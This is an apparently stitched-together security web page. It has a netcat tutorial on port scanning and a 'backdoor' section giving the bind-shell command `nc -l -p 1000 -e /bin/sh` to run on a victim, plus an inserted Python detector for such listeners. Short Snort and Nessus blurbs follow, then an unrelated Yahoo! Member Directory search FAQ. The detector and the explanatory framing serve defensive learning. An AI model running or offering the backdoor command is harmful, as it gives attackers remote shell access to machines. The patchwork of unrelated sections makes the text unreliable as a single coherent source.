Netcat



How many times have you come across a blog post that calls netcat a “swiss army knife”? Netcat probably is a swiss army knife, but on steroids. It is a must-have tool in your personal toolkit. If you haven’t had your first joy ride with netcat, read on; this post is for you.

Netcat allows you to read and write data across TCP and UDP sockets. That’s it, nothing else. In the simplicity of this utility, lies its very strength. Let us look at some of the very cool stuff that netcat is capable of:

Netcat is your port scanner: Yes, it can be a worthy port scanner and you can port scan a host using the following syntax:

nc -v -w2 -z scanme.org 20-40


-v makes the output verbose (add another v to increase the verbosity)

-w specifies that netcat should wait the specified number of seconds, before it decides that the attempt was useless.

-z ensures that netcat does not send any data to the listening ports.

20-40 is the port range that netcat is going to sprawl through.

Netcat is a backdoor: OK, I don’t want to sound like the guys selling you a vegetable crusher on a shopping channel and bragging about how it can crush carrots and cabbages at the same time. But netcat is even more versatile than that. It is often used as a backdoor by crackers. The following syntax (on the victim machine) will run an instance of netcat listening on port 1000:

nc -l -p 1000 -e /bin/sh

-l instructs the netcat binary to be in listen mode, waiting for inbound connections

-p specifies the port number i.e. 1000

-e specifies the program or a binary that it should run after successful connection i.e. a shell (/bin/sh)

The attacker can connect back to the victim machine, on the specified port, using another netcat instance on his machine:

nc -v victim_IP 1000

victim_IP is the IP of the machine where netcat was previously executed with the -l and -e options. Of course, the attacker first has to figure out a way to upload the netcat binary onto the victim’s machine.
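A defender-side check for the listener described above, as an added example that is not part of the original post: it parses process command lines and flags netcat started with both -l and -e. The function names, the binary-name set, the sample process list and port 4444 are constructed assumptions.

```python
import shlex

NETCAT_NAMES = {"nc", "netcat", "ncat"}  # assumed binary names; extend as needed
TAKES_VALUE = set("pwe")  # short options from this page that take a value

def parse_nc(cmdline):
    """Return (listen, port, program) for a netcat command line, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: not parseable
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in NETCAT_NAMES:
        return None
    listen, port, program = False, None, None
    i = 1
    while i < len(argv):
        arg = argv[i]
        i += 1
        if not arg.startswith("-") or arg.startswith("--") or arg == "-":
            continue            # host, port range or long option: ignored here
        cluster = arg[1:]       # handles clustered flags such as -lvp
        for pos, ch in enumerate(cluster):
            if ch == "l":
                listen = True
            elif ch in TAKES_VALUE:
                value = cluster[pos + 1:]       # attached form, e.g. -w2
                if not value and i < len(argv):
                    value = argv[i]             # separate form, e.g. -p 1000
                    i += 1
                if ch == "p":
                    port = value
                elif ch == "e":
                    program = value
                break           # rest of the cluster was the option's value
    return listen, port, program

def find_backdoor_listeners(ps_lines):
    """Flag 'PID COMMAND' lines where netcat both listens (-l) and execs (-e)."""
    hits = []
    for line in ps_lines:
        pid, _, cmd = line.strip().partition(" ")
        parsed = parse_nc(cmd)
        if parsed and parsed[0] and parsed[2]:
            hits.append((int(pid), parsed[1], parsed[2]))
    return hits

# Constructed sample in "pid args" form; not real captured data.
SAMPLE = ["812 /usr/sbin/sshd -D", "4021 nc -l -p 1000 -e /bin/sh", "4200 nc -l -p 8080",
          "4100 nc -v -w2 -z scanme.org 20-40", "4188 /bin/nc -lvp 4444 -e /bin/bash"]
```

Calling find_backdoor_listeners(SAMPLE) reports only the two listeners that hand a shell to whoever connects; the port scan and the plain listener on 8080 are not flagged.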

Snort


Snort is an open source network intrusion prevention and detection system (IDS/IPS) developed by Sourcefire. Combining the benefits of signature, protocol and anomaly-based inspection, Snort is the most widely deployed IDS/IPS technology worldwide. With millions of downloads and approximately 300,000 registered users, Snort has become the de facto standard for IPS.

NESSUS vulnerability assessment tool

The Nessus vulnerability scanner is the world-leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs and across physically separate networks.

How do I search for a Yahoo! member?

It's easy to find a Yahoo! member. Go to the Yahoo! Member Directory (http://ca.members.yahoo.com) and find the area marked "Find People on Yahoo!" at the top of the page.

You can search by Yahoo! ID, real name, or keywords. Enter your search term into the box and check the appropriate option below. When you are done making your selections, click the "Find" button to bring up the results.

The Yahoo! Member Directory search can only display up to 500 results for each query. If you would like to see additional profiles you may need to increase your search criteria or try using the advanced search.

Note: Some public profiles will not show up in a Member Directory search, depending on whether or not the owner of that profile has chosen to make that profile publicly searchable.